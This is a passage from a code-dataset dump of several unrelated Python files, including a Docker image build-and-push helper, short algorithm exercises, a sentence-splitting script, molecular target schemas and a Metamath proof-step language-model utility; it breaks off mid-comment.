DockerClient\nfrom docker.errors import APIError, BuildError, ContainerError\n\ndocker_client = DockerClient(base_url=\"unix://var/run/docker.sock\", timeout=600)\n\n\ndef build_image(image_conf, image_fullname, dockerfile_directory, dockerfile_path, debug):\n print(\"> [Info] Building: \" + image_fullname)\n try:\n if debug:\n pp = pprint.PrettyPrinter(indent=1)\n print(\">> Building configuration: \")\n pp.pprint(image_conf)\n print(\"\\n\")\n print(\">> Dockerfile directory: \")\n print(dockerfile_directory)\n print(\"\\n\")\n print(\">> Dockerfile relative path: \")\n print(dockerfile_path)\n print(\"\\n\")\n\n docker_client.images.build(\n path=dockerfile_directory,\n dockerfile=dockerfile_path,\n tag=image_fullname,\n quiet=True,\n nocache=True,\n buildargs=image_conf[\"build_args\"] if \"build_args\" in image_conf else {},\n forcerm=True,\n )\n print(\"Build successful\")\n except BuildError as build_error:\n print(\"> [Error] Build failed\\n\")\n for line in build_error.build_log:\n if \"stream\" in line:\n print(line[\"stream\"].strip())\n exit(1)\n except APIError as api_error:\n print(\"> [Error] API error - \" + str(api_error))\n exit(1)\n\n\ndef run_image(image_fullname, image_conf, debug):\n volume = {}\n\n print(\"> [Info] Testing \" + image_fullname)\n\n try:\n if \"test_config\" in image_conf:\n test_config = image_conf[\"test_config\"]\n if \"volume\" in test_config:\n # Split path:directory string and build volume dict\n splitted_volume = test_config[\"volume\"].split(\":\")\n volume[f\"{os.getcwd()}/{splitted_volume[0]}\"] = {\n \"bind\": splitted_volume[1],\n \"mode\": \"ro\",\n }\n for cmd in test_config[\"cmd\"]:\n if debug:\n print(\">> Running test: \" + cmd)\n container = docker_client.containers.run(\n image=image_fullname,\n command=cmd,\n volumes=volume,\n stdout=True,\n stderr=True\n )\n if debug:\n for line in container.decode('utf-8').split('\\n'):\n print(line)\n print(\"Tests successful\")\n except ContainerError as container_error:\n print(f\"'{container_error.command}' command failed\")\n for line in container_error.stderr.decode('utf-8').split('\\n'):\n print(line)\n exit(1)\n except APIError as api_error:\n print(\"> [Error] Command test failed - \" + str(api_error))\n exit(1)\n finally:\n docker_client.containers.prune()\n\n\ndef login_to_registry(env_conf):\n print(\"> [Info] Login to registry\")\n try:\n docker_client.login(\n username=env_conf[\"docker_reg_username\"], password=env_conf[\"docker_reg_password\"]\n )\n print(\"Login successful\")\n except APIError as api_error:\n print(\"> [Error] Login failed - \" + str(api_error))\n exit(1)\n\n\ndef push_image(image_fullname):\n print(\"> [Info] Pushing \" + image_fullname)\n try:\n for line in docker_client.images.push(image_fullname, stream=True, decode=True):\n # Keep 1st and last line of push cmd\n if \"status\" in line and \"progressDetail\" not in line:\n print(f\"{line['status']}\")\n if \"error\" in line:\n print(line[\"error\"])\n exit(1)\n print(\"Push successful\")\n except APIError as api_error:\n print(\"> [Error] Push failed - \" + str(api_error))\n exit(1)\n","repo_name":"ekinoben/docker-buildbox","sub_path":"src/docker_image.py","file_name":"docker_image.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"17441270054","text":"# 3.\nT = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n n=int(input())\n num = input()\n score = [0]*10\n for i in range(n):\n i = int(num[i])\n score[i] += 1\n m = max(score)\n for i in range(9,0,-1):\n if score[i] == m:\n break\n print('#{} {} {}'.format(test_case, i, m))","repo_name":"dodoyeon/SW_Academy","sub_path":"list1/max_num.py","file_name":"max_num.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74897196967","text":"import math\n\nnum = int(input())\nlist = [] # input 정수들\nlist2 = [] # 최대공약수의 약수들\ngcd = 0 # 01,12를 각각 뺀 최대공약수\nfor i in range(num):\n list.append(int(input()))\n if i == 1:\n gcd = abs(list[1] - list[0])\n gcd = math.gcd(abs(list[i] - list[i - 1]), gcd)\ngcd_a = int(gcd ** 0.5)\n\nfor i in range(2, gcd_a + 1):\n if gcd % i == 0:\n if i not in list2:\n list2.append(i)\n if gcd // i not in list2:\n list2.append(gcd // i)\n\nlist2.append(gcd)\nlist2.sort()\n# list2 = sorted(list2)\n\nfor i in list2:\n print(i, end=' ')\n","repo_name":"chjwon/BOJ_answer_py","sub_path":"2000/2981.py","file_name":"2981.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10731304358","text":"import config, utils\nfrom tqdm.auto import tqdm\nimport pandas as pd\nimport nltk\nimport os\n\n\ndef break_row_by_sentence(row: pd.Series):\n row['text'] = nltk.sent_tokenize(row['text'])\n return row\n\n\ndef break_dataset_by_sentence(dataset: pd.DataFrame):\n return dataset.progress_apply(break_row_by_sentence, axis=1)\n\n\ndef break_data_by_sentence():\n nltk.download('punkt')\n utils.prepare_directory(config.sentencebroken_data_directory)\n\n datasets = utils.get_datasets(\n config.clean_data_directory,\n desc='Loading datasets',\n verbose=True\n )\n for category, dataset in tqdm(\n datasets.items(),\n desc='Breaking datasets by sentence',\n ncols=config.tqdm_ncols,\n position=0,\n leave=True\n ):\n sentencebroken_filename = utils.get_filename(category, ext='csv')\n sentencebroken_filepath = os.path.join(\n config.sentencebroken_data_directory,\n sentencebroken_filename\n )\n if os.path.exists(sentencebroken_filepath) and not config.sentbreak_overwrite:\n continue\n\n tqdm.pandas(desc=category, position=1, ncols=config.tqdm_ncols, leave=False)\n sentencebroken_dataset = break_dataset_by_sentence(dataset)\n sentencebroken_dataset.to_csv(\n sentencebroken_filepath,\n mode='w', index=False\n )\n\n print('Finished breaking datasets by sentence!')\n\n\nif __name__ == '__main__':\n break_data_by_sentence()","repo_name":"DiyarH/nlp1402project","sub_path":"src/dataset/sent_break.py","file_name":"sent_break.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459790321","text":"\"\"\"\nDivide and Conquer:\n\n399 - Longest Common Sequence Problem\n- S1 and S2 are given strings\n- Find the length of the longest subsequence which is common to both strings\n- Subsequence: a sequence that can be driven from another sequence by deleting some elements without chaning the order of them\nExample:\n- s1 = \"elephant\n- s2 = \"erepat\"\n- output = 5\n- longest string: \"eepat\n\"\"\"\n\n\ndef findLongestCommonSequence(s1: str, s2: str, index1: int, index2: int) -> int:\n if index1 >= len(s1) or index2 >= len(s2):\n return 0\n\n if s1[index1] == s2[index2]:\n return 1 + findLongestCommonSequence(s1, s2, index1 + 1, index2 + 1)\n else:\n b = findLongestCommonSequence(s1, s2, index1, index2 + 1)\n c = findLongestCommonSequence(s1, s2, index1 + 1, index2)\n\n return max(b, c)\n\n\ns1 = \"elephant\"\ns2 = \"erepat\"\nprint(findLongestCommonSequence(s1, s2, 0, 0))\n\n\ndef findLongestCommonSequenceString(s1: str, s2: str, index1: int, index2: int) -> str:\n if index1 >= len(s1) or index2 >= len(s2):\n return \"\"\n\n if s1[index1] == s2[index2]:\n return s1[index1] + findLongestCommonSequenceString(s1, s2, index1 + 1, index2 + 1)\n else:\n b = findLongestCommonSequenceString(s1, s2, index1, index2 + 1)\n c = findLongestCommonSequenceString(s1, s2, index1 + 1, index2)\n\n return b if len(b) > len(c) else c\n\nprint(findLongestCommonSequenceString(s1, s2, 0, 0))\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"14-Divide_and_Conquer/399_LongestCommonSequenceProblem.py","file_name":"399_LongestCommonSequenceProblem.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10164389587","text":"from pathlib import Path\nfrom typing import Any, Dict, Optional, Tuple, Union # noqa: F401\n\nfrom asapdiscovery.data.openeye import (\n bytes64_to_oedu,\n load_openeye_design_unit,\n load_openeye_pdb,\n oechem,\n oedu_to_bytes64,\n oemol_to_pdb_string,\n pdb_string_to_oemol,\n save_openeye_design_unit,\n)\nfrom asapdiscovery.data.schema_v2.identifiers import TargetIdentifiers\nfrom asapdiscovery.modeling.modeling import split_openeye_mol\nfrom asapdiscovery.modeling.schema import MoleculeFilter\nfrom pydantic import Field, root_validator\n\nfrom .schema_base import (\n DataModelAbstractBase,\n DataStorageType,\n check_strings_for_equality_with_exclusion,\n schema_dict_get_val_overload,\n write_file_directly,\n)\n\n\nclass InvalidTargetError(ValueError):\n ...\n\n\nclass Target(DataModelAbstractBase):\n \"\"\"\n Schema for a Target, wrapper around a PDB file\n \"\"\"\n\n target_name: str = Field(None, description=\"The name of the target\")\n\n ids: Optional[TargetIdentifiers] = Field(\n None,\n description=\"TargetIdentifiers Schema for identifiers associated with this target\",\n )\n\n data: str = Field(\n \"\",\n description=\"PDB file stored as a string to hold internal data state\",\n repr=False,\n )\n data_format: DataStorageType = Field(\n DataStorageType.pdb,\n description=\"Enum describing the data storage method\",\n allow_mutation=False,\n )\n\n @root_validator(pre=True)\n @classmethod\n def _validate_at_least_one_id(cls, v):\n # check if skip validation\n if v.get(\"_skip_validate_ids\"):\n return v\n else:\n ids = v.get(\"ids\")\n compound_name = v.get(\"target_name\")\n # check if all the identifiers are None, sometimes when this is called from\n # already instantiated ligand we need to be able to handle a dict and instantiated class\n if compound_name is None:\n if ids is None or all(\n [not v for v in schema_dict_get_val_overload(ids)]\n ):\n raise ValueError(\n \"At least one identifier must be provide, or target_name must be provided\"\n )\n return v\n\n @classmethod\n def from_pdb(\n cls, pdb_file: Union[str, Path], target_chains=[], ligand_chain=\"\", **kwargs\n ) -> \"Target\":\n kwargs.pop(\"data\", None)\n # directly read in data\n # First load full complex molecule\n complex_mol = load_openeye_pdb(pdb_file)\n\n # Split molecule into parts using given chains\n mol_filter = MoleculeFilter(\n protein_chains=target_chains, ligand_chain=ligand_chain\n )\n split_dict = split_openeye_mol(complex_mol, mol_filter)\n\n return cls.from_oemol(split_dict[\"prot\"], **kwargs)\n\n def to_pdb(self, filename: Union[str, Path]) -> None:\n # directly write out data\n write_file_directly(filename, self.data)\n\n @classmethod\n def from_oemol(cls, mol: oechem.OEMol, **kwargs) -> \"Target\":\n kwargs.pop(\"data\", None)\n pdb_str = oemol_to_pdb_string(mol)\n return cls(data=pdb_str, **kwargs)\n\n def to_oemol(self) -> oechem.OEMol:\n return pdb_string_to_oemol(self.data)\n\n def __eq__(self, other: Any) -> bool:\n if not isinstance(other, Target):\n return NotImplemented\n # check if the data is the same\n # but exclude the MASTER record as this is not always in the SAME PLACE\n # for some strange reason\n return check_strings_for_equality_with_exclusion(\n self.data, other.data, \"MASTER\"\n )\n\n def __ne__(self, other: Any) -> bool:\n return not self.__eq__(other)\n\n\nclass PreppedTarget(DataModelAbstractBase):\n \"\"\"\n Schema for a PreppedTarget, wrapper around an OpenEye Design Unit\n \"\"\"\n\n target_name: str = Field(None, description=\"The name of the target\")\n\n ids: Optional[TargetIdentifiers] = Field(\n None,\n description=\"TargetIdentifiers Schema for identifiers associated with this target\",\n )\n\n data: bytes = Field(\n \"\",\n description=\"OpenEye oedu file stored as a bytes object **encoded in base64** to hold internal data state\",\n repr=False,\n )\n data_format: DataStorageType = Field(\n DataStorageType.b64oedu,\n description=\"Enum describing the data storage method\",\n allow_mutation=False,\n )\n\n @root_validator(pre=True)\n @classmethod\n def _validate_at_least_one_id(cls, v):\n # simpler as we never need to pop attrs off the serialised representation.\n ids = v.get(\"ids\")\n compound_name = v.get(\"target_name\")\n # check if all the identifiers are None\n if compound_name is None:\n if ids is None or all([not v for v in schema_dict_get_val_overload(ids)]):\n raise ValueError(\n \"At least one identifier must be provide, or target_name must be provided\"\n )\n return v\n\n @classmethod\n def from_oedu(cls, oedu: oechem.OEDesignUnit, **kwargs) -> \"PreppedTarget\":\n kwargs.pop(\"data\", None)\n oedu_bytes = oedu_to_bytes64(oedu)\n return cls(data=oedu_bytes, **kwargs)\n\n def to_oedu(self) -> oechem.OEDesignUnit:\n return bytes64_to_oedu(self.data)\n\n @classmethod\n def from_oedu_file(cls, oedu_file: Union[str, Path], **kwargs) -> \"PreppedTarget\":\n kwargs.pop(\"data\", None)\n oedu = load_openeye_design_unit(oedu_file)\n return cls.from_oedu(oedu=oedu, **kwargs)\n\n def to_oedu_file(self, filename: Union[str, Path]) -> None:\n oedu = self.to_oedu()\n save_openeye_design_unit(oedu, filename)\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/schema_v2/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"13968531102","text":"from tree_parser import *\n#from model import *\nimport numpy as np\n\nimport random\n\n\"\"\"\nThe data utilities take a statement in a proof, assigns each\nnode a number from 0 to number_of_nodes_placeholder-1 with 0\nbeing the root node:\n\n number_of_nodes_placeholder: shape=()\n the number of nodes in the tree\n children_placeholder: shape=(None,max_axiom_arity)\n a list of the number associated to the children of the node\n prop_number_placeholder: shape=(None)\n the number associated to the proposition at that node with that arity\n arity_placeholder: shape=(None)\n the arity of the corresponding node\n\"\"\"\nlanguage_model_extra_variables_of_each_type = 0 # Chosen arbitrarily\n\n# a minimal class, which we can use to build objects.\nclass Container:\n def __init__(self):\n pass\n\nclass LanguageModel:\n def __init__(self, database):\n \"\"\"Builds a number of dictionaries equal to max_axiom_arity\"\"\"\n self.max_axiom_arity = max([p.arity() for p in database.non_entails_axioms.values()]) + 1 # one more than the max\n\n self.database = database\n\n self.max_unconstrained_arity = 10000000\n self.searcher = SearchProblem(database, max_unconstrained_arity = self.max_unconstrained_arity)\n\n self.tautologies = set()\n for p in self.database.propositions.values():\n e_hyps = [h for h in p.hyps if h.type == 'e']\n if p.vclass=='|-' and len(e_hyps) == 0:\n self.tautologies.add(p.label)\n print('tautologies:', len(self.tautologies))\n\n # the propositions with trivial unconstrained arity. That is, the ones\n # that are really easy to apply.\n self.constrained_propositions = set(\n p.label for p in self.database.propositions.values()\n if p.vclass == '|-' and p.unconstrained_arity() == 0\n )\n\n # figure out the names of the read variables\n # self.real_wff_names = set()\n # self.real_set_names = set()\n # self.real_class_names = set()\n # real_name_dict = {'wff': self.real_wff_names, 'set': self.real_set_names, 'class': self.real_class_names}\n #\n # for p in self.database.propositions.itervalues():\n # for label in p.f:\n # vclass = p.f[label].vclass\n # real_name_dict[vclass].add(label)\n # print real_name_dict\n\n self.constructor_dictionary = [{} for _ in range(self.max_axiom_arity)]\n\n # we need to define some extra variables, which we'll randomly assign when we read in a statement\n # this is a reasonable amount of data augmentation.\n self.extra_wffs = language_model_extra_variables_of_each_type+max(len([f for f in p.f.values() if f.vclass=='wff']) for p in database.propositions.values() )\n self.extra_classes = language_model_extra_variables_of_each_type+max(len([f for f in p.f.values() if f.vclass=='class']) for p in database.propositions.values() )\n self.extra_sets = language_model_extra_variables_of_each_type+max(len([f for f in p.f.values() if f.vclass=='set']) for p in database.propositions.values() )\n\n # hand code these in.\n self.extra_sets = 20\n self.extra_wffs = 18\n self.extra_classes = 27\n\n self.wff_names = ['WFFVar'+str(i) for i in range(self.extra_wffs)]\n self.set_names = ['SetVar'+str(i) for i in range(self.extra_sets)]\n self.class_names = ['ClassVar'+str(i) for i in range(self.extra_classes)]\n\n self.num_extra_variable_names = len(self.wff_names)+len(self.set_names)+len(self.class_names)\n self.extra_variable_dict = {}\n\n # the names for the unconstrained variables\n #self.ua_names = ['UA'+str(i) for i in range(self.max_unconstrained_arity)]\n\n # add them to the dictionary\n arityzerodict = self.constructor_dictionary[0]\n for i in range(self.extra_wffs):\n arityzerodict['WFFVar'+str(i)]=len(arityzerodict)\n self.extra_variable_dict['WFFVar'+str(i)]=len(self.extra_variable_dict)\n for i in range(self.extra_classes):\n arityzerodict['ClassVar'+str(i)]=len(arityzerodict)\n self.extra_variable_dict['ClassVar'+str(i)]=len(self.extra_variable_dict)\n for i in range(self.extra_sets):\n arityzerodict['SetVar'+str(i)]=len(arityzerodict)\n self.extra_variable_dict['SetVar'+str(i)]=len(self.extra_variable_dict)\n # for i in range(len(self.ua_names)):\n # arityzerodict['UA'+str(i)]=len(arityzerodict)\n # self.extra_variable_dict['UA'+str(i)]=len(self.extra_variable_dict)\n\n # a block to create a dictionary that takes a symbol to its vclass\n self.symbol_to_vclass = {label:database.propositions[label].vclass for label in database.non_entails_axioms}\n for symbol in self.wff_names:\n self.symbol_to_vclass[symbol] = 'wff'\n for symbol in self.set_names:\n self.symbol_to_vclass[symbol] = 'set'\n for symbol in self.class_names:\n self.symbol_to_vclass[symbol] = 'class'\n\n # a list of all of the extra variables, for use later\n self.new_names = self.wff_names+self.set_names+self.class_names\n\n # describe the number of variables we've used\n print('wff variables:',self.extra_wffs)\n print('class variables:',self.extra_classes)\n print('set variables:',self.extra_sets)\n #print 'ua variables:', self.ua_names\n\n # now add the actual constructor axioms to our dictionary\n for p in database.non_entails_axioms.values():\n c_dict = self.constructor_dictionary[p.arity()]\n c_dict[p.label] = len(c_dict)\n\n for i in range(self.max_axiom_arity):\n print(len(self.constructor_dictionary[i]),'constructor axioms with arity',i)\n\n # build a pair of dictionaries that convert (arity,num) to total_num\n # and vice versa. This is ugly. Whatever\n self.arity_num_to_global_index = {}\n self.global_index_to_arity_num=[]\n global_index = 0\n for arity in range(self.max_axiom_arity):\n for num in range(len(self.constructor_dictionary[arity])):\n self.global_index_to_arity_num.append((arity,num))\n self.arity_num_to_global_index[(arity,num)]=global_index\n global_index+=1\n\n \"\"\"sets up the data sets. We divide the propositions into training/validation/test and\n then compile the corresponding list of statements\"\"\"\n list_of_propositions = self.database.propositions_list[:] # database.propositions.values()\n np.random.seed(seed=121451345)\n list_of_propositions = np.random.permutation(list_of_propositions)\n\n num_validation = len(list_of_propositions)//10\n num_test = num_validation\n num_training = len(list_of_propositions)-num_test-num_validation\n self.training_propositions = list_of_propositions[:num_training]\n self.training_propositions = [_ for _ in self.training_propositions if _.type=='p']\n self.validation_propositions = list_of_propositions[num_training:num_training+num_validation]\n self.validation_propositions = [_ for _ in self.validation_propositions if _.type=='p']\n self.test_propositions = list_of_propositions[num_training+num_validation:]\n self.test_propositions = [_ for _ in self.test_propositions if _.type=='p']\n\n if self.database.remember_proof_steps:\n self.all_proof_steps = [] # except those that refer to e or f-type hypotheses\n for p in self.database.propositions.values():\n self.all_proof_steps += [step for step in p.entails_proof_steps if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n\n self.training_proof_steps = []\n for p in self.training_propositions:\n self.training_proof_steps += [step for step in p.entails_proof_steps\n if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n self.validation_proof_steps = []\n for p in self.validation_propositions:\n self.validation_proof_steps += [step for step in p.entails_proof_steps\n if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n self.test_proof_steps = []\n for p in self.test_propositions:\n self.test_proof_steps += [step for step in p.entails_proof_steps\n if not (step.prop.type=='f' or step.prop.type == 'e')]\n\n print()\n print('training steps:', len(self.training_proof_steps))\n print('validation steps:', len(self.validation_proof_steps))\n print('test steps:', len(self.test_proof_steps))\n\n\n # figure out how frequenly each proposition is used\n self.prop_usage = [0 for p in self.database.propositions]\n for s in self.all_proof_steps:\n self.prop_usage[s.prop.number]+=1\n\n # figure out what the most difficult proof step is\n self.max_depth = max([s.height for s in self.all_proof_steps]) + 1\n print('max proof step depth:', self.max_depth-1)\n\n\n # figure out the number of times each proposition is used.\n # self.prop_uses = [0.1] * len(self.database.propositions) # for numberical stability\n # for step in self.all_proof_steps:\n # self.prop_uses[step.prop.number] += 1\n # self.initial_b = np.log(1.0*np.array(self.prop_uses)/sum(self.prop_uses))\n\n\n # build up a database of propositions by unconstrained arity\n # that is, total_unconstrained_arity is the total\n # of all of the unconstrained arities of all of the propositions.\n # and unconstrained_arity_indices is a list of p.unconstrained_arity()\n # unique indices for each proposition p.\n self.total_unconstrained_arity = 0\n self.unconstrained_arity_indices = {}\n self.unconstrained_label_to_number = {}\n for p in self.database.propositions_list: # in order of proposition number\n u_arity = p.unconstrained_arity()\n self.unconstrained_arity_indices[p.label]=list(range(self.total_unconstrained_arity, self.total_unconstrained_arity + u_arity))\n self.total_unconstrained_arity += u_arity\n self.unconstrained_label_to_number[p.label]=len(self.unconstrained_label_to_number)\n #self.max_unconstrained_arity = max([p.unconstrained_arity() for p in self.database.propositions.itervalues()])\n\n self.total_constructor_arity = 0\n self.constructor_arity_indices = {}\n self.constructor_label_to_number = {}\n self.constructor_labels = []\n for p in database.non_entails_axioms.values():\n u_arity = p.arity()\n self.constructor_arity_indices[p.label]=list(range(self.total_constructor_arity, self.total_constructor_arity + u_arity))\n self.total_constructor_arity += u_arity\n self.constructor_label_to_number[p.label]=len(self.constructor_label_to_number)\n self.constructor_labels.append(p.label)\n for name in self.wff_names+self.set_names+self.class_names: #+self.ua_names:\n self.constructor_arity_indices[name] = [] # the extra arity 0 constructors\n self.constructor_label_to_number[name]=len(self.constructor_label_to_number)\n self.constructor_labels.append(name)\n\n # a lookup table for the index into all the propositions of the label\n self.label_to_number = {x.label:x.number for x in self.database.propositions.values()}\n for x in self.new_names:\n self.label_to_number[x] = -1 # all variables should always be included\n\n def training_set(self): # DEFUNCT\n assert self.database.remember_proof_steps\n return np.random.permutation(self.training_proof_steps)\n\n def random_proof_step(self, source=None):\n assert self.database.remember_proof_steps\n if source is None:\n return random.choice(self.all_proof_steps)\n if source == \"test\":\n return random.choice(self.test_proof_steps)\n if source == \"train\":\n return random.choice(self.training_proof_steps)\n if source == \"validation\":\n return random.choice(self.validation_proof_steps)\n\n\n def axiom_counts(self):\n max_axiom_arity = max([p.arity() for p in self.database.non_entails_axioms.values()])+1\n # out = [0 for x in range(max_axiom_arity)]\n # for p in self.database.non_entails_axioms.itervalues():\n # out[p.arity()]+=1\n out = [len(d) for d in self.constructor_dictionary]\n return max_axiom_arity, out\n\n # this lists all the free variables in context and generates a dictionary replacing them with my own variable types.\n def random_replacement_dict_f(self, f = None):\n if f is None: return self.random_permutation_dict()\n\n statement_wffs = [l for l in f if f[l].vclass=='wff']\n statement_classes = [l for l in f if f[l].vclass=='class']\n statement_sets = [l for l in f if f[l].vclass=='set']\n wff_random = np.random.choice(self.extra_wffs, len(statement_wffs), replace=False) if self.extra_wffs>0 else {}\n class_random = np.random.choice(self.extra_classes, len(statement_classes), replace=False) if self.extra_classes>0 else {}\n set_random = np.random.choice(self.extra_sets, len(statement_sets), replace=False) if self.extra_sets>0 else {}\n\n replacement_dict = {}\n for i in range(len(wff_random)):\n replacement_dict[statement_wffs[i]] = self.wff_names[wff_random[i]]\n for i in range(len(class_random)):\n replacement_dict[statement_classes[i]] = self.class_names[class_random[i]]\n for i in range(len(set_random)):\n replacement_dict[statement_sets[i]] = self.set_names[set_random[i]]\n\n return replacement_dict\n\n def deterministic_replacement_dict_f(self, f = None):\n assert f is not None\n\n statement_wffs = [l for l in f if f[l].vclass=='wff']\n statement_classes = [l for l in f if f[l].vclass=='class']\n statement_sets = [l for l in f if f[l].vclass=='set']\n # wff_random = np.random.choice(self.extra_wffs, len(statement_wffs), replace=False) if self.extra_wffs>0 else {}\n # class_random = np.random.choice(self.extra_classes, len(statement_classes), replace=False) if self.extra_classes>0 else {}\n # set_random = np.random.choice(self.extra_sets, len(statement_sets), replace=False) if self.extra_sets>0 else {}\n\n replacement_dict = {}\n for i in range(len(statement_wffs)):\n replacement_dict[statement_wffs[i]] = self.wff_names[i]\n for i in range(len(statement_classes)):\n replacement_dict[statement_classes[i]] = self.class_names[i]\n for i in range(len(statement_sets)):\n replacement_dict[statement_sets[i]] = self.set_names[i]\n\n return replacement_dict\n\n def random_permutation_dict(self):\n replacement_dict={}\n\n out_vars = self.wff_names[:]\n np.random.shuffle(out_vars)\n for i in range(len(out_vars)):\n replacement_dict[self.wff_names[i]] = out_vars[i]\n\n out_vars = self.set_names[:]\n np.random.shuffle(out_vars)\n for i in range(len(out_vars)):\n replacement_dict[self.set_names[i]] = out_vars[i]\n\n out_vars = self.class_names[:]\n np.random.shuffle(out_vars)\n for i in range(len(out_vars)):\n replacement_dict[self.class_names[i]] = out_vars[i]\n return replacement_dict\n\n def random_replacement_dict(self, context):\n statement_wffs = [l for l in context.f if context.f[l].vclass=='wff']\n statement_classes = [l for l in context.f if context.f[l].vclass=='class']\n statement_sets = [l for l in context.f if context.f[l].vclass=='set']\n wff_random = np.random.choice(self.extra_wffs, len(statement_wffs), replace=False)\n class_random = np.random.choice(self.extra_classes, len(statement_classes), replace=False)\n set_random = np.random.choice(self.extra_sets, len(statement_sets), replace=False)\n\n replacement_dict = {}\n for i in range(len(wff_random)):\n replacement_dict[statement_wffs[i]] = self.wff_names[wff_random[i]]\n for i in range(len(class_random)):\n replacement_dict[statement_classes[i]] = self.class_names[class_random[i]]\n for i in range(len(set_random)):\n replacement_dict[statement_sets[i]] = self.set_names[set_random[i]]\n\n return replacement_dict\n\n def standardize_context(self, prop, tree=None):\n '''\n takes in a proposition and return it in a standardized form,\n in particular, keeping the hypotheses, variables, d statements,\n and tree.\n\n prop: a proposition\n tree: an optional tree that will replace the prop's tree\n\n this retuns an object with the following properties:\n number, tree, hyps, d_labels\n\n This uses a fixed replacement dictionary because it will make it\n easier to interpret on consequative runs.\n '''\n\n # use the default tree\n if tree is None: tree = prop.tree\n\n context = Container()\n context.label = prop.label\n\n context.number = prop.number\n replacement_dict = self.deterministic_replacement_dict_f(f=prop.f)\n mandatory = [h.label for h in prop.hyps if h.type == 'f']\n\n # might as well keep the tree\n context.tree = tree.copy().replace_values(replacement_dict)\n\n # I think that this is everything we need\n context.hyps = []\n for h in prop.hyps:\n newh = Container()\n newh.type = h.type\n if h.type == 'e':\n newh.tree = h.tree.copy().replace_values(replacement_dict)\n newh.label = h.label\n else:\n newh.label = replacement_dict[h.label]\n newh.old_label = h.label\n context.hyps.append(newh)\n\n # fuck d, we'll just consider d_labels\n replaced_mandatory = [replacement_dict[label] for label in mandatory]\n context.mandatory = mandatory\n context.d_labels = set()\n for (i,j) in prop.d_labels:\n if i in mandatory and j in mandatory:\n context.d_labels.add((replacement_dict[i], replacement_dict[j]))\n for i in self.new_names:\n for j in self.new_names:\n if i == j:\n continue\n if i not in replaced_mandatory or j not in replaced_mandatory:\n context.d_labels.add((i,j))\n\n # the list (err... dictionary) of variables\n context.f = {k:Container() for k in self.new_names}\n for k in self.new_names:\n context.f[k].statement = [k]\n\n # list all the variables that appear in the hypotheses\n context.hyp_symbols = set()\n for h in context.hyps:\n if h.type=='e':\n context.hyp_symbols |= set(h.tree.list())\n context.hyp_symbols &= set(self.new_names)\n context.main_but_not_hyp_symbols = set(replaced_mandatory).difference(context.hyp_symbols)\n\n # the hyp symbols are the ones we're allowed to use.\n # the main_but_not_hyp_symbols symbols are explicitly excluded\n\n # I'm not sure that we should actually include this, but meh\n context.replacement_dict = replacement_dict\n return context\n\n def simple_apply_prop(self, tree, prop, context, vclass=None):\n # assert prop.unconstrained_arity() == 0\n fit = prop_applies_to_statement(tree, prop, context, vclass=vclass)\n assert fit is not None\n return [h.tree.copy().replace(fit) for h in prop.hyps if h.type=='e']\n\n '''\n Iterated fit for the tree and hyps.\n This doesn't check for disjointness, just matches the trees\n '''\n def reconstruct_fit(self, tree, hyps, prop_label):\n prop = self.database.propositions[prop_label]\n prop_variables = [f for f in prop.f]\n\n current = tree.fit(prop.tree, prop_variables)\n\n for h, ph in zip(hyps, [h.tree for h in prop.hyps if h.type=='e']):\n next_fit = h.fit(ph, prop_variables)\n if dictionary_merge(current, next_fit) is None: return None\n\n return current\n\n def prop_applies_to_statement(self, tree, prop, context, vclass=None):\n return prop_applies_to_statement(tree, prop, context, vclass=vclass)\n\n\ndef dictionary_merge(current, new):\n # merges new into current\n for x in new:\n if x in current:\n if current[x] != new[x]:\n return None\n else:\n current[x] = new[x]\n return current\n\n\"\"\"\nNow we use generate some utilities that we'll use for fitting propositions and\naxioms to statements, or just which ones apply in general.\n\"\"\"\n\n# attempts to fit a proposition to a statement. If it does fit, it returns the fit.\ndef prop_applies_to_statement(tree, prop, context, vclass=None):\n # verify first that the vclass is okay.\n if vclass is not None and prop.vclass != vclass: return None\n\n #context_variables = set(f.label for f in context.f.itervalues())\n #prop_variables = set(f.label for f in prop.f.itervalues())\n prop_variables = [f for f in prop.f]\n\n #print prop_variables\n # attempt to fit to the tree\n fit = tree.fit(prop.tree,prop_variables)\n\n if fit is None: return None # it doesn't work. Sadness.\n\n # we only need the mandatory variables\n context_variables = [x.label for x in context.hyps if x.type=='f']\n prop_variables = [x.label for x in prop.hyps if x.type=='f']\n vars_that_appear = {v:fit[v].set().intersection(context_variables) for v in fit}\n\n # print 'context_variables', context_variables\n # print 'prop_variables', prop_variables\n # print 'vars_that_appear', vars_that_appear\n\n for (xvar,yvar) in prop.d_labels:\n if xvar not in fit or yvar not in fit: continue\n for i in vars_that_appear[xvar]:\n for j in vars_that_appear[yvar]:\n if (i,j) not in context.d_labels:\n return None\n\n\n return fit\n\n\n\n\n# How the fuck do we do this search?\n# I'm just going to insert an ugly hack here, so that I have something at least.\n# Given that the brute force approach isn't terrible, this should be good, right?\n\n\"\"\"\nThis is going to be my algorithm: It's a lame algorithm but it should be good enough\nWe store some number of objects, which are a list of pairs of the following form:\n(location in tree, dictionary)\ndictionary takes a proposition or \"*\" and returns one of two things:\n1. A list of valid labels of matching propositions (if the number is small or if we're out of nodes)\n2. Another pair of the above form.\n\nTo search for valid labels, we start at the first location, and look up two values in the\ndictionary: \"*\" and whatever the label at that position is. If it's another location pair,\nfollow it and then union everything.\n\nTo build up the tree, we start with a node and add things to it. If the number of items in\nthe 